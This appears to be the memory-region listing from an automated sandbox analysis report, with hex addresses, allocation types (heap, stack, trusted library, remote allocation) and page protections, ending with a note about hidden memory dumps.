page read and write
3C69000
trusted library allocation
page read and write
4301000
heap
page read and write
2973000
trusted library allocation
page read and write
46A0000
trusted library allocation
page read and write
430D000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
3EF5000
heap
page read and write
1A6B9000
heap
page read and write
4D4000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
42C5000
heap
page read and write
1F5B000
stack
page read and write
34CF000
stack
page read and write
2088000
trusted library allocation
page read and write
3B7000
heap
page read and write
2A95000
trusted library allocation
page read and write
1AA66000
heap
page read and write
23C1000
trusted library allocation
page read and write
2080000
heap
page read and write
3F2F000
heap
page read and write
4F4000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
504000
heap
page read and write
2D3000
heap
page read and write
1B4AB000
stack
page read and write
7869000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
29F000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
376F000
stack
page read and write
42FF000
heap
page read and write
431D000
heap
page read and write
385000
heap
page read and write
3780000
heap
page read and write
399000
heap
page read and write
280D000
trusted library allocation
page read and write
6469000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
B72000
unkown
page execute read
462000
heap
page read and write
2869000
trusted library allocation
page read and write
2971000
trusted library allocation
page read and write
196000
heap
page read and write
7FE8994C000
trusted library allocation
page execute and read and write
237E000
trusted library allocation
page read and write
358000
heap
page read and write
3F2E000
heap
page read and write
42D7000
heap
page read and write
42D9000
heap
page read and write
46A0000
trusted library allocation
page read and write
1C58B000
heap
page read and write
4E7000
heap
page read and write
2728000
trusted library allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
2340000
remote allocation
page read and write
10000
heap
page read and write
2085000
heap
page read and write
2340000
remote allocation
page read and write
3E6000
heap
page read and write
297E000
trusted library allocation
page read and write
4C4000
heap
page read and write
3EF5000
heap
page read and write
1EA4000
heap
page read and write
1A6FF000
stack
page read and write
2E0000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
1AA30000
heap
page read and write
3786000
heap
page read and write
1C60000
heap
page read and write
253000
heap
page read and write
1C40C000
stack
page read and write
27BB000
trusted library allocation
page read and write
524000
heap
page read and write
1A9B2000
heap
page read and write
454000
heap
page execute and read and write
363000
heap
page read and write
23D0000
heap
page execute and read and write
6E69000
trusted library allocation
page read and write
1A9CB000
heap
page read and write
4D4000
heap
page read and write
2A6F000
stack
page read and write
1D90000
trusted library allocation
page read and write
39E000
heap
page read and write
3E6E000
heap
page read and write
466000
heap
page read and write
3B7000
heap
page read and write
3FB000
heap
page read and write
1C197000
heap
page read and write
388000
heap
page read and write
37D000
heap
page read and write
39E000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
2F70000
trusted library allocation
page read and write
23C8000
trusted library allocation
page read and write
20000
heap
page read and write
1A4A4000
heap
page execute and read and write
7FE89950000
trusted library allocation
page execute and read and write
37FD000
heap
page read and write
4E9000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
7FE899B0000
trusted library allocation
page execute and read and write
350000
heap
page read and write
1C190000
heap
page read and write
2979000
trusted library allocation
page read and write
42A1000
heap
page read and write
1B53F000
stack
page read and write
383C000
heap
page read and write
1A9EE000
heap
page read and write
2A9000
heap
page read and write
466000
heap
page read and write
277000
heap
page read and write
7FE898A3000
trusted library allocation
page read and write
7FE89AC0000
trusted library allocation
page read and write
399000
heap
page read and write
3EFA000
heap
page read and write
433000
heap
page read and write
1A5B0000
heap
page execute and read and write
3F04000
heap
page read and write
324000
heap
page read and write
452000
heap
page read and write
498000
heap
page read and write
278F000
stack
page read and write
7FE89AA8000
trusted library allocation
page read and write
3D9E000
heap
page read and write
680000
heap
page read and write
7FE898AB000
trusted library allocation
page read and write
431D000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
520000
heap
page read and write
431D000
heap
page read and write
3EB000
heap
page read and write
37F4000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
4301000
heap
page read and write
42F9000
heap
page read and write
7FE89946000
trusted library allocation
page read and write
337000
heap
page read and write
3269000
trusted library allocation
page read and write
4EF000
trusted library allocation
page read and write
339000
heap
page read and write
1A4A0000
heap
page execute and read and write
20000
heap
page read and write
3C0000
heap
page read and write
8D0000
heap
page read and write
1A925000
stack
page read and write
B70000
unkown
page readonly
7FE89A90000
trusted library allocation
page execute and read and write
7FE89892000
trusted library allocation
page read and write
A069000
trusted library allocation
page read and write
3BE000
heap
page read and write
4D9000
heap
page read and write
231C000
stack
page read and write
1C74E000
stack
page read and write
38E000
heap
page read and write
41A000
heap
page read and write
25C0000
heap
page read and write
1AC5C000
stack
page read and write
388B000
heap
page read and write
223C000
trusted library allocation
page read and write
2C6F000
stack
page read and write
3DE9000
heap
page read and write
7FE89A43000
trusted library allocation
page read and write
1BF000
heap
page read and write
1C45000
heap
page read and write
1C550000
heap
page read and write
1FC000
stack
page read and write
2AAF000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
37F7000
heap
page read and write
1B07F000
stack
page read and write
300000
heap
page read and write
2E00000
heap
page read and write
1A5AE000
stack
page read and write
41A000
heap
page read and write
427000
heap
page read and write
403000
heap
page read and write
7FE89940000
trusted library allocation
page read and write
314000
heap
page read and write
1B3B0000
heap
page read and write
3E4000
heap
page read and write
1C52F000
stack
page read and write
397000
heap
page read and write
38C8000
trusted library allocation
page read and write
495000
heap
page read and write
4D6000
heap
page read and write
1C192000
heap
page read and write
7FE89A47000
trusted library allocation
page read and write
3A50000
heap
page read and write
1C30000
trusted library allocation
page read and write
1EA0000
heap
page read and write
2D8000
heap
page read and write
12310000
trusted library allocation
page read and write
1C90F000
stack
page read and write
36A000
heap
page read and write
4EF000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
457000
heap
page read and write
1ADDE000
stack
page read and write
91F000
heap
page read and write
50A000
heap
page read and write
2031000
trusted library allocation
page read and write
2312000
trusted library allocation
page read and write
1A4A8000
heap
page execute and read and write
386E000
heap
page read and write
10000
heap
page read and write
234C000
trusted library allocation
page read and write
380000
heap
page read and write
4D5000
heap
page read and write
1F5000
heap
page read and write
310000
heap
page read and write
1C115000
heap
page read and write
7FE89894000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
21F000
heap
page read and write
3F0000
heap
page read and write
386E000
heap
page read and write
2AA5000
trusted library allocation
page read and write
27BD000
trusted library allocation
page read and write
4E7000
heap
page read and write
1E50000
trusted library allocation
page execute read
2AE000
heap
page read and write
7FE89986000
trusted library allocation
page execute and read and write
7FE89B50000
trusted library allocation
page read and write
195000
stack
page read and write
3F6000
heap
page read and write
2804000
trusted library allocation
page read and write
430C000
heap
page read and write
380D000
heap
page read and write
1E84000
heap
page read and write
1AE0000
trusted library allocation
page read and write
48D000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
3E6C000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
382000
heap
page read and write
1C6F0000
heap
page read and write
2301000
trusted library allocation
page read and write
385B000
heap
page read and write
399000
heap
page read and write
4CF000
heap
page read and write
D5000
stack
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
1CEB000
direct allocation
page read and write
3D1000
heap
page read and write
3B80000
trusted library allocation
page read and write
7FE89950000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
431D000
heap
page read and write
4300000
heap
page read and write
3F2E000
heap
page read and write
3D37000
heap
page read and write
42DB000
heap
page read and write
42F6000
heap
page read and write
42D9000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
42C9000
heap
page read and write
4D9000
heap
page read and write
7FE89A4C000
trusted library allocation
page read and write
283D000
stack
page read and write
430A000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
355000
heap
page read and write
3863000
heap
page read and write
3CE000
heap
page read and write
1F10000
direct allocation
page read and write
31E000
heap
page read and write
1A5EE000
heap
page execute and read and write
152000
stack
page read and write
3D30000
heap
page read and write
3B7000
heap
page read and write
1E10000
heap
page read and write
1B36000
heap
page read and write
143000
stack
page read and write
44A000
heap
page read and write
1A22C000
stack
page read and write
1ABAC000
stack
page read and write
431D000
heap
page read and write
3B7A000
stack
page read and write
4D0000
trusted library allocation
page read and write
1B630000
heap
page read and write
1B34F000
stack
page read and write
250000
heap
page read and write
426000
heap
page read and write
3883000
heap
page read and write
2DF000
heap
page read and write
91D000
heap
page read and write
33AC000
stack
page read and write
7FE89B90000
trusted library allocation
page read and write
1A030000
heap
page read and write
4D6000
heap
page read and write
4CF000
heap
page read and write
48D000
heap
page read and write
3F16000
heap
page read and write
2FE000
heap
page read and write
39AA000
trusted library allocation
page read and write
4D7000
heap
page read and write
1CF0000
direct allocation
page read and write
1E9000
heap
page read and write
1B3B4000
heap
page read and write
39D000
heap
page read and write
4300000
heap
page read and write
35DF000
stack
page read and write
3B7000
heap
page read and write
1A933000
heap
page read and write
9669000
trusted library allocation
page read and write
12040000
trusted library allocation
page read and write
377F000
heap
page read and write
3DE9000
heap
page read and write
4D4000
heap
page read and write
447000
heap
page read and write
3EF9000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
3F20000
heap
page read and write
387F000
heap
page read and write
2977000
trusted library allocation
page read and write
2A0000
heap
page read and write
3F2000
heap
page read and write
2912000
trusted library allocation
page read and write
442000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
2A8E000
stack
page read and write
7FE898A4000
trusted library allocation
page read and write
270000
heap
page read and write
398000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
2F9000
stack
page read and write
2829000
trusted library allocation
page read and write
2250000
heap
page read and write
1A80F000
stack
page read and write
3255000
trusted library allocation
page read and write
37D4000
heap
page read and write
2EC0000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
2CD0000
heap
page read and write
3784000
heap
page read and write
1B1CF000
stack
page read and write
1C00000
heap
page read and write
1B0000
heap
page read and write
2513000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
42A0000
heap
page read and write
37E000
stack
page read and write
37FA000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
42D7000
heap
page read and write
1A695000
heap
page read and write
2460000
heap
page read and write
3D6000
heap
page read and write
2C8000
heap
page read and write
377C000
heap
page read and write
10000
heap
page read and write
37D4000
heap
page read and write
12331000
trusted library allocation
page read and write
410000
heap
page read and write
377C000
heap
page read and write
2451000
trusted library allocation
page read and write
7FE89A74000
trusted library allocation
page read and write
37E8000
heap
page read and write
37D2000
heap
page read and write
3E0000
heap
page read and write
1E0000
heap
page read and write
383000
heap
page read and write
12061000
trusted library allocation
page read and write
19B000
stack
page read and write
288000
stack
page read and write
1A930000
heap
page read and write
40E2000
heap
page read and write
1C49A000
stack
page read and write
309F000
stack
page read and write
1B6000
heap
page read and write
41A000
heap
page read and write
406000
heap
page read and write
8269000
trusted library allocation
page read and write
1CEF000
direct allocation
page read and write
1C9BF000
stack
page read and write
1F97000
direct allocation
page read and write
4669000
trusted library allocation
page read and write
450000
heap
page read and write
1A4DE000
heap
page execute and read and write
3F11000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
3D34000
heap
page read and write
3EFB000
heap
page read and write
8C69000
trusted library allocation
page read and write
10000
heap
page read and write
1EF0000
direct allocation
page read and write
7FE89A82000
trusted library allocation
page read and write
42A000
heap
page read and write
337000
heap
page read and write
3D38000
heap
page read and write
1D04000
heap
page read and write
2519000
trusted library allocation
page read and write
7FE8989D000
trusted library allocation
page execute and read and write
20000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
3E9D000
heap
page read and write
3B7000
heap
page read and write
1D8F000
stack
page read and write
37F0000
heap
page read and write
3F22000
heap
page read and write
24AF000
trusted library allocation
page read and write
42F9000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
458000
heap
page read and write
431D000
heap
page read and write
20000
heap
page read and write
2CA0000
trusted library allocation
page read and write
328000
heap
page read and write
222F000
stack
page read and write
430A000
heap
page read and write
2491000
trusted library allocation
page read and write
31CE000
stack
page read and write
1C1D5000
heap
page read and write
42D2000
heap
page read and write
430B000
heap
page read and write
2FF000
heap
page read and write
4CF000
heap
page read and write
3B80000
trusted library allocation
page read and write
1D00000
heap
page read and write
3F11000
heap
page read and write
466000
heap
page read and write
499000
heap
page read and write
1B64C000
heap
page read and write
264A000
stack
page read and write
397000
heap
page read and write
4D4000
heap
page read and write
3B5000
heap
page read and write
3F21000
heap
page read and write
1E50000
heap
page execute and read and write
10000
heap
page read and write
281A000
trusted library allocation
page read and write
2C0000
heap
page read and write
3A6E000
stack
page read and write
3F11000
heap
page read and write
3D9000
heap
page read and write
38E000
heap
page read and write
8D7000
heap
page read and write
1C110000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89A42000
trusted library allocation
page read and write
2280000
heap
page execute and read and write
9D0000
heap
page read and write
1C36000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
1CD0000
direct allocation
page read and write
1CD7000
direct allocation
page read and write
4715000
heap
page read and write
42CC000
heap
page read and write
5A69000
trusted library allocation
page read and write
2FC000
heap
page read and write
7FE898B3000
trusted library allocation
page read and write
31C000
heap
page read and write
222E000
stack
page read and write | page guard
B1E000
stack
page read and write
4E1000
heap
page read and write
42CC000
heap
page read and write
3770000
heap
page read and write
3250000
trusted library allocation
page read and write
439000
heap
page read and write
3ECD000
heap
page read and write
385000
heap
page read and write
3A0000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
1F8F000
stack
page read and write
4CB000
heap
page read and write
3783000
heap
page read and write
1A971000
heap
page read and write
3EF9000
heap
page read and write
2713000
trusted library allocation
page read and write
1B00000
heap
page read and write
4D1000
heap
page read and write
318000
heap
page read and write
1AFFF000
stack
page read and write
39E8000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
46A0000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
3B7000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
42D4000
heap
page read and write
339000
heap
page read and write
1EB0000
direct allocation
page read and write
7FE89976000
trusted library allocation
page execute and read and write
7FE89B50000
trusted library allocation
page read and write
3F21000
heap
page read and write
392000
heap
page read and write
486000
heap
page read and write
4710000
heap
page read and write
1C40000
heap
page read and write
40E0000
heap
page read and write
2FFF000
stack
page read and write
442000
heap
page read and write
1AF4000
heap
page read and write
430A000
heap
page read and write
1B640000
heap
page read and write
1AEEE000
stack
page read and write
399000
heap
page read and write
3FB000
heap
page read and write
399000
heap
page read and write
4E0000
trusted library allocation
page read and write
1E17000
heap
page read and write
3D38000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
7FE89A5C000
trusted library allocation
page read and write
2DA000
heap
page read and write
1ACD9000
stack
page read and write
22AE000
stack
page read and write
2D4000
heap
page read and write
44A000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
37D2000
heap
page read and write
2916000
trusted library allocation
page read and write
3D41000
heap
page read and write
3879000
heap
page read and write
3EFB000
heap
page read and write
2652000
trusted library allocation
page read and write
1F50000
direct allocation
page read and write
48E000
heap
page execute and read and write
160000
heap
page read and write
4E9000
heap
page read and write
4719000
heap
page read and write
1D90000
heap
page read and write
42C7000
heap
page read and write
1DF0000
heap
page read and write
269000
heap
page read and write
1A6FC000
heap
page read and write
2844000
trusted library allocation
page read and write
37E7000
heap
page read and write
202F000
stack
page read and write
349000
heap
page read and write
7FE89A98000
trusted library allocation
page read and write
3F20000
heap
page read and write
1A9B0000
heap
page read and write
1CD3000
direct allocation
page read and write
1ED0000
direct allocation
page read and write
446000
heap
page read and write
4D8000
heap
page read and write
392000
heap
page read and write
1AA2F000
heap
page read and write
2B0000
heap
page read and write
1BD000
heap
page read and write
2365000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
3806000
trusted library allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
4D4000
heap
page read and write
3F0B000
heap
page read and write
467000
heap
page read and write
7FE898A0000
trusted library allocation
page read and write
3EF2000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
395000
heap
page read and write
2AEB000
trusted library allocation
page read and write
41B000
heap
page read and write
1D90000
heap
page read and write
40A0000
heap
page read and write
396000
heap
page read and write
3ED000
heap
page read and write
3F16000
heap
page read and write
1A630000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
2D50000
trusted library allocation
page read and write
3EEC000
heap
page read and write
418000
heap
page read and write
467000
heap
page read and write
1C90000
direct allocation
page read and write
461000
heap
page read and write
2000000
heap
page execute and read and write
33D000
heap
page read and write
3876000
heap
page read and write
316000
heap
page read and write
3D6F000
heap
page read and write
387000
heap
page read and write
7FE89A30000
trusted library allocation
page read and write
1C555000
heap
page read and write
12301000
trusted library allocation
page read and write
458000
heap
page execute and read and write
4DE000
heap
page read and write
467000
heap
page read and write
4300000
heap
page read and write
4A3000
heap
page read and write
9ED000
heap
page read and write
1C10000
trusted library allocation
page read and write
49B000
remote allocation
page execute and read and write
1C14B000
heap
page read and write
1C090000
heap
page read and write
1DC0000
trusted library allocation
page read and write
4C0000
heap
page read and write
2AF0000
trusted library allocation
page execute
40A1000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
C0000
trusted library allocation
page read and write
3DBE000
stack
page read and write
245F000
stack
page read and write
1E80000
heap
page read and write
2D1000
heap
page read and write
3879000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
2500000
trusted library allocation
page read and write
386B000
heap
page read and write
450000
heap
page execute and read and write
2631000
trusted library allocation
page read and write
1A95E000
heap
page read and write
31E000
heap
page read and write
2CD4000
heap
page read and write
34E000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
323D000
trusted library allocation
page read and write
2626000
trusted library allocation
page read and write
2586000
trusted library allocation
page read and write
3876000
heap
page read and write
4B0000
trusted library allocation
page read and write
7FE898A2000
trusted library allocation
page read and write
3F22000
heap
page read and write
3D32000
heap
page read and write
195000
stack
page read and write
4F9000
heap
page read and write
43A000
heap
page read and write
There are 776 hidden memdumps, click here to show them.